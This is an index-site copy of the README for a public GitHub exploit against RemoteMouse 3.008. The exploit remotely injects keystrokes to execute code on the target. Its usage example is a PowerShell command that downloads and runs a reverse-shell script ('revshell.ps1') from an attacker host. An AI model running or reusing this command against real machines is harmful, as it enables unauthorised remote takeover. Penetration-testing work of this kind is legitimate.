An open API service indexing awesome lists of open source software.

https://github.com/p0dalirius/remotemouse-3.008-exploit

This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.
https://github.com/p0dalirius/remotemouse-3.008-exploit

exploit pentest remote-control remotemouse

Last synced: 4 months ago
JSON representation

This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

Awesome Lists containing this project

README

        

# RemoteMouse-3.008-Exploit


GitHub release (latest by date)

YouTube Channel Subscribers


The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

## Video Proof of Concept

https://user-images.githubusercontent.com/79218792/146586908-6389683b-a32a-478d-8eb5-5459e96e86f9.mp4

## Usage

```bash
./RemoteMouse-3.008-Exploit.py --target-ip --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""
```

## Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

## References
- https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/